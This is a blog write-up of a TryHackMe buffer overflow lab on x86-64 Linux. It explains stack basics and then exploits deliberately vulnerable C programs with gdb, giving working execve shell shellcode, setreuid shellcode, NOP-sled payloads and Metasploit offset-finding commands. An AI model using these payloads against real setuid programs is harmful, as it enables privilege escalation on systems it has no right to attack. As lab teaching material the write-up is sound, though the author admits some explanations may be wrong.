Buffer Overflows - TryHackMe

14 min read

Published at: Apr 19, 2024

black and silver cpu

Learn how to get started with basic Buffer Overflows on x86-64 linux programs!

Metadata

Meta

Goal

The goal is to explore simple stack overflows on x86-64 linux programs using gdb.

Cheat Sheet

Before we begin, as always there is a generic Cheat Sheet for this room which could be integrated in your own notes. You find it at at the bottom of this write-up. You can also find all of my notes at https://hailstormsec.com/posts/categories/notes.

Tasks

Process Layout

Memory showing the stack and heap

- Heap: Memory set aside for dynamic calculations. - Stack: Information required to run the program - registers, functions, arguments, etc.

Bellow is an image to visualise the difference:

Heap vs stack

Questions(s)

  1. Where is dynamically allocated memory stored?
  2. Where is information about sunctions (e.g. local arguments) stored?

Answers(s)

  1. Heap
  2. Stack

x86-64 Procedures

Stack operations:

  • Pushing: add data onto the stack
  • Popping: remove data from the stack

Examples:

  • push var - push value onto stack
    • Uses var or value stored in memory location of var
    • Decrements the stack pointer (rsp) by 8
    • Writes above value to new location of rsp which is now at the top of the stack
Stack before push
Stack before push
Stack after push
Stack after push
  • pop var - read value and pop it off the stack
    • Reads the value at the address given by the stack pointer (rsp)
    • Increments the stack pointer (rsp)
    • Store the value that was read into var
Stack before push
Stack before pop
Stack after pop
Stack after pop

Frames:

  • Allocates a "frame" once a function is called.
  • Used to store the function variables, arguments etc.
  • Deallocated once function is complete.
Stack displaying 3 frames

Question(s)

  1. What direction does the stack grown(l for lower/h for higher)
  2. What instruction is used to add data onto the stack?

Answer(s)

  1. l (Stack top with the lower addresses is at the button - thus growing lower)
  2. Push

Procedures Continued

Let us better understand assembly and memory using this example:

C code

int add(int a, int b){
   int new = a + b;
   return new;
}

int calc(int a, int b){
   int final = add(a, b);
   return final;
}

calc(4, 5)

x86-64 assembly:

calc.png
calc function
add.png
add function

Terms:

  • Caller: The function calling another function - calc.
  • Callee: The function being called by another function - add. In assembly, they are called using call, or callq.
  • Return: At the end of a function it will return with retq.

Registers (store arguments):

64-bit 32-bit 16-bit 8-bit Special Purpose
for functions
When calling
a function
When writing
a function
rax eax ax ah,al Return Value Might be changed Use freely
rbx ebx bx bh,bl Will not be changed Save before using!
rcx ecx cx ch,cl 4th integer argument Might be changed Use freely
rdx edx dx dh,dl 3rd integer argument Might be changed Use freely
rsi esi si sil 2nd integer argument Might be changed Use freely
rdi edi di sil 1st integer argument Might be changed Use freely
rbp ebp bp bpl Frame Pointer Maybe Be Careful Maybe Be Careful
rsp esp sp spl Stack Pointer Be Very Careful! Be Very Careful!
r8 r8d r8w r8b 5th integer argument Might be changed Use freely
r9 r9d r9w r9b 6th integer argument Might be changed Use freely
r10 r10d r10w r10b Might be changed Use freely
r11 r11d r11w r11b Might be changed Use freely
r12 r12d r12w r12b Will not be changed Save before using!
r13 r13d r13w r13b Will not be changed Save before using!
r14 r14d r14w r14b Will not be changed Save before using!
r15 r15d r15w r15b Will not be changed Save before using!

"Might be changed" = "Caller saved"; "Will not be changed" = "Callee saved". - https://math.hws.edu/eck/cs220/f22/registers.html


Question(s)

What register stores the return address?

Answers(s)

rax


Endianess

  • LSB: Least Significant Byte
  • MSB: Most Significant Byte
Little endian order
Little Endian - 0x12345678
big-endian.png
Big Endian - 0x12345678

Overwriting Variables

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int variable = 0;
  char buffer[14];

  gets(buffer);

  if(variable != 0) {
      printf("You have changed the value of the variable\n");
  } else {
      printf("Try again?\n");
  }
}

Question(s)

What is the minimum number of characters needed to overwrite the variable?

Assuming that the stack doesn't add padding to the 14 bytes, we need to simply overflow those 14 bytes. Keep in mind that the stack push characters toward the bottom - thus overflowing into the variable when overflowing the buffer in the memory.

Answer(s)

15


Overwriting Function Pointers

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

void special()
{
    printf("this is the special function\n");
    printf("you did this, friend!\n");
}

void normal()
{
    printf("this is the normal function\n");
}

void other()
{
    printf("why is this here?");
}

int main(int argc, char **argv)
{
    volatile int (*new_ptr) () = normal;
    char buffer[14];
    gets(buffer);
    new_ptr();
}

Here we want to overflow the pointer to instead point to the special function. First we need to locate where in the memory special is located. This we can do with gdb. Start with gdb func-pointer.

Special function in memory
Starts at 0x0000000000400567

Now we can run inside gdb to see how many characters we can use for the buffer overflow. Since the buffer-variable is 14 bytes long - we should be overflowing our variable at that point. However there might be some padding, so we start with making it 15 character long and then increasing by 1 till we have reached our buffer limit.

20v21.png
The limit is 20 (hex for 'A' is 41)

This means we have 6 bytes to work with (one hex character is one byte). Because of little-endian, we need to print the

LSB

Least Significant Byte

first and then pad with null-bytes (x00) to reach our 6 bytes:

\x67\x05\x40\x00\x00\x00

So to instead point the function to the special function we run the following:

python -c "print('A'*14 + '\x67\x05\x40\x00\x00\x00')" | ./func-pointer

Buffer Overflows

The program:

#include <stdio.h>
#include <stdlib.h>

void copy_arg(char *string)
{
    char buffer[140];
    strcpy(buffer, string);
    printf("%s\n", buffer);
    return 0;
}

int main(int argc, char **argv)
{
    printf("Here's a program that echo's out your input\n");
    copy_arg(argv[1]);
}

The shellcode to open a shell:

\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05

No Operations (NOP) slide:

  • NOP: \x90
  • To avoid having to finding the exact place in memory where our shellcode payload is located, prepending with NOP:s tells the program to keep executing - reaching the shellcode if after the NOP:s.
  • It also deals with the problem of memory addresses not being the same from one runtime to another (if they only change with a couple bytes).
Nop slide
NOP sled -> Shellcode -> Memory address (to point execution to the shellcode)

Finding the offset

Manually

Starting this exercise we will once again be utilising gdb. To finding the offset (where we start to overflow into the return value). Looking at the source code we know the buffer is 140 bytes long. However there will be saved registers in between the buffer and return address.

memory-layout.png

So to try and find the offset we need to at least go highest than 140 bytes, looking for `\x41` (hex value of 'A') in the return address to see when we overflow.

offset.png
run $(python -c "print('A'*158)")

With 6 bytes as the return address, the offset is 152.

We can also find the same 6 bytes running i r.

We can see rip with the return address
Red: Return address, Orange: We also overflowed rbp

With Metasploit

We can utilise pattern_create and pattern_offset in metasploit to find the offset in a more automatic manner.

Start by using pattern_create:

Using pattern create tool
-l: length - set to 200 since we know it will at least be larger than 140

Could not find 'rex-text'

Edit the file and change the shebang:

Rex-text fix with editing shebang

Now we want to run the program again with the generated string (`run 'STRING'`). Then we can inspect the registers with `i r`:

We cannot see what is inside rip, but we know rbp is before
We cannot read what's inside the return address (rip), but we know rbp is right before the return address

By copying these 8 bytes (64-bits) and running pattern_offset we will get the offset to the rbp, but to get the offset for rip we need to add the 8 bytes of the rbp.

rbp offset + rbp size (8) = rip offset

Running pattern_offset will give us the rbp offset
rbp offset: 144

This gives us: 144+8=152


Crafting our payload

Utilising a NOP sled in front of the payload given to us by the task should ensure that it gets executed.

Nop sled + payload + padding +a address of payload = 152 + address of payload

https://www.arsouyes.org/blog/2019/54_Shellcode/

shellcode = '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'
'\x90'*100 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*12 + 'B'*6

100 + 40 (payload length) + 12 + 6 = 152 + 6

This should give us all B:s (\x42) if run.

With our payload we got the result we wanted
Perfect, it works!

Now the only thing we need is the address of our payload (or anywhere on the sled). To do this we will examine the memory:

x/100x $rsp-200
  • x/: examine
  • 100: Number of memory addresses to display
  • x: display hex
  • $rsp: Registry Stack Pointer, should be where the program end ~return
  • -200: Go back 200 memory addresses
Examined memory
We will use 0x7fffffffe948 to make sure we land on the NOP sled

However with little-endian, we will need to print the bytes in reverse, making the payload:

'\x90'*100 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*12 + '\x48\xe9\xff\xff\xff\x7f'
shell-wrong-user.png

We got a shell!! ... but as the wrong user.


Setuid, setreuid and editing the payload

Why we get a shell as user1 is because we launch the process with our user id. To recieve the shell as user2 we need to run the script with their effective user id:

  1. User ID (UID):

    • The UID is a numerical identifier assigned to each user on the system.
    • It is a unique value associated with a user account and is used by the system to distinguish between different users.
    • When a user logs in, their processes are initially assigned the UID of the user account.
  2. Effective User ID (EUID):

    • The EUID is another numerical identifier associated with a process.
    • While a process is running, its EUID may be different from its UID.
    • The EUID is used to determine the effective permissions of a process when accessing resources, such as files or other system services.
    • Changing the EUID allows a process to temporarily escalate or reduce its privileges.

First we need the user id of user2 - we do so by reading /etc/passwd:

Uid of user2 is 1002
cat /etc/passwd

Now we need to append a function in our shellcode to change EUID. We will generate the shellcode with pwntools.

Install pwntools (run as root):

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

Pwntools is a CTF framework and exploit development library - of course with the possability of generating many shellcode functions. To generate what we want - I will run the following command.

pwn shellcraft -f d amd64.linux.setreuid 1002
  • shellcraft: Craft shell code
  • -l: List available shellcodes
  • -f: Format (d: escaped hex string)
  • 1002: UID

This gave me the following: \x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05 (14)

Now prepend this to our shellcode, remember we have to remove some of the NOP sled equivelant to the size of the added shellcode.

'\x90'*86 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*12 + '\x48\xe9\xff\xff\xff\x7f'
It worked - we have a shell as user2

Answer(s)

omgyoudidthissocool!!


Buffer Overflows 2

#include <stdio.h>
#include <stdlib.h>

void concat_arg(char *string)
{
    char buffer[154] = "doggo";
    strcat(buffer, string);
    printf("new word is %s\n", buffer);
    return 0;
}

int main(int argc, char **argv)
{
    concat_arg(argv[1]);
}

It is very similar to the last task. Let's start with finding the offset.

buffer (154) + registry = offset

Generate a pattern to find the offset with pattern_create:

┌──(Hailst0rm(ソフ)sec)-[~]
└─$ /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
Running pattern in gdb to find offset
Registry: 0x4133664132664131

Now use pattern_offset to find the offset:

┌──(Hailst0rm(ソフ)sec)-[~]
└─$ /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -l 200 -q 4133664132664131
[*] Exact match at offset 155

Registry offset + registry length = Return offset => 155 + 8 = 163

We can try this offset to confirm:

Our calculation of 163 is correct
run $(python -c "print 'A'*163 + 'B'*6") - 42 is hex for 'B'

We can use the same shellcode as in the previous task - however we need to generate a new shellcode for the EUID.

pwn shellcraft -f d amd64.linux.setreuid 1003
\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05

Now simply do some math to make sure you use the offset. NOP sled + shellcode + padding = 163 => 90 + 54 + 19 = 163.

'\x90'*90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*19 + 'B'*6

Now we run this in gdb to find the memory address of our shellcode.

On the row before the payload we find the nop sled
0x7fffffffe924, you see the shellcode on the next row

Now simply replace the B:s with the address found. Remember that the system uses little-endian.

'\x90'*90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*19 + '\x24\xe9\xff\xff\xff\x7f'
Use your payload and you are user3
We got the last flag!

Answer(s)

wowanothertime!!

Final comment

This was my first attempt at buffer overflow, thus some explanations may not be completely clear or even wrong. However I hope that this writeup has helped you in some way, shape, or form.

I want to shout out this writeup however, that goes a bit deeper into the different steps: https://l1ge.github.io/tryhackme_bof1/


Cheat Sheet

You can also find all of the following under the notes category.

Terms

Term Definition
Heap Memory set aside for dynamic calculations
Stack Information required to run the program - registers, functions, arguments, etc.
Push Operation to add data into the stack
Pop Remove data from the stack
Frame Allocates a "frame" once a function is called and used to store functions, variable, arguments, etc. for that function. Deallocates the memory once complete.
Caller The function that calls for another function.
Callee The function that gets called upon by another function.
LSB Least Significant Byte
MSB Most Significant Byte
Little Endian LSB first
Big Endian MSB first
NOP sled No Operation sled, will let the program keep executing but not performing any action. Good to buffer up till shellcode.
stack-vs-heap.png
Stack vs Heap
Little endian example
Little Endian - 0x12345678

x86-64

Registers

64-bit 32-bit 16-bit 8-bit Special Purpose
for functions
When calling
a function
When writing
a function
rax eax ax ah,al Return Value Might be changed Use freely
rbx ebx bx bh,bl Will not be changed Save before using!
rcx ecx cx ch,cl 4th integer argument Might be changed Use freely
rdx edx dx dh,dl 3rd integer argument Might be changed Use freely
rsi esi si sil 2nd integer argument Might be changed Use freely
rdi edi di sil 1st integer argument Might be changed Use freely
rbp ebp bp bpl Frame Pointer Maybe Be Careful Maybe Be Careful
rsp esp sp spl Stack Pointer Be Very Careful! Be Very Careful!
r8 r8d r8w r8b 5th integer argument Might be changed Use freely
r9 r9d r9w r9b 6th integer argument Might be changed Use freely
r10 r10d r10w r10b Might be changed Use freely
r11 r11d r11w r11b Might be changed Use freely
r12 r12d r12w r12b Will not be changed Save before using!
r13 r13d r13w r13b Will not be changed Save before using!
r14 r14d r14w r14b Will not be changed Save before using!
r15 r15d r15w r15b Will not be changed Save before using!

"Might be changed" = "Caller saved"; "Will not be changed" = "Callee saved". - https://math.hws.edu/eck/cs220/f22/registers.html

Finding the Offset

Metasploit

  1. Copy into path:
sudo cp "$(locate pattern_create.rb)" /usr/local/bin
sudo cp "$(locate pattern_offset.rb)" /usr/local/bin
  1. Use pattern_create to generate a pattern.
  2. Run program with said input.
  3. Use GDB to find offset address.
  4. Run pattern_offset to get the offset value.
pattern_create.rb -l 200
pattern_offset.rb -l 200 -q 4133664132664131
  • -l: Length
  • -q: Query

Could not find 'rex-text'

Edit the file and change the shebang:

Fix rex-fix error

GDB

Disassemble:

disassemble FUNCTION_NAME

Inspect registry:

i r

Examine memory:

x/100x $rsp-200
  • x/: examine
  • 100: Number of memory addresses to display
  • x: display hex
  • $rsp: Registry Stack Pointer, should be where the program end ~return
  • -200: Go back 200 memory addresses

Crafting shellcode

Pwntools

Install pwntools (run as root):

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

Set EUID (effective uid):

pwn shellcraft -f d amd64.linux.setreuid 1002
  • shellcraft: Craft shell code
  • -l: List available shellcodes
  • -f: Format (d: escaped hex string)
  • 1002: UID

x86-64 shell

https://www.arsouyes.org/blog/2019/54_Shellcode/

shellcode = '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'

Support me

Thank you so much for reading and I hope you found it inspirational or helpful! You can best support me by doing any of the following bellow!

  • Turn off Adblocker: A simple yet impactful way to support me for free.
  • Sign Up: If you haven't already, consider signing up to get access to more content and receive optional newsletters.
  • Buy Premium: Explore the Premium option for additional perks and exclusive content.
  • Give a Tip: Your generosity is always very appreciated.

You can read more about the perks of being a Member or Subscriber here.

Additionally, you can stay updated and engage with me on social media:

  • Twitter: Follow for real-time updates and insights.
  • LinkedIn: Connect with me on a professional platform.

Contact me here: [email protected]

Discussion

Become a member and never miss a post!

By signing up you have read and agree to the Privacy Policy.

Newsletter

Bonus content

Learn more...

Continue reading

Continue reading

Continue reading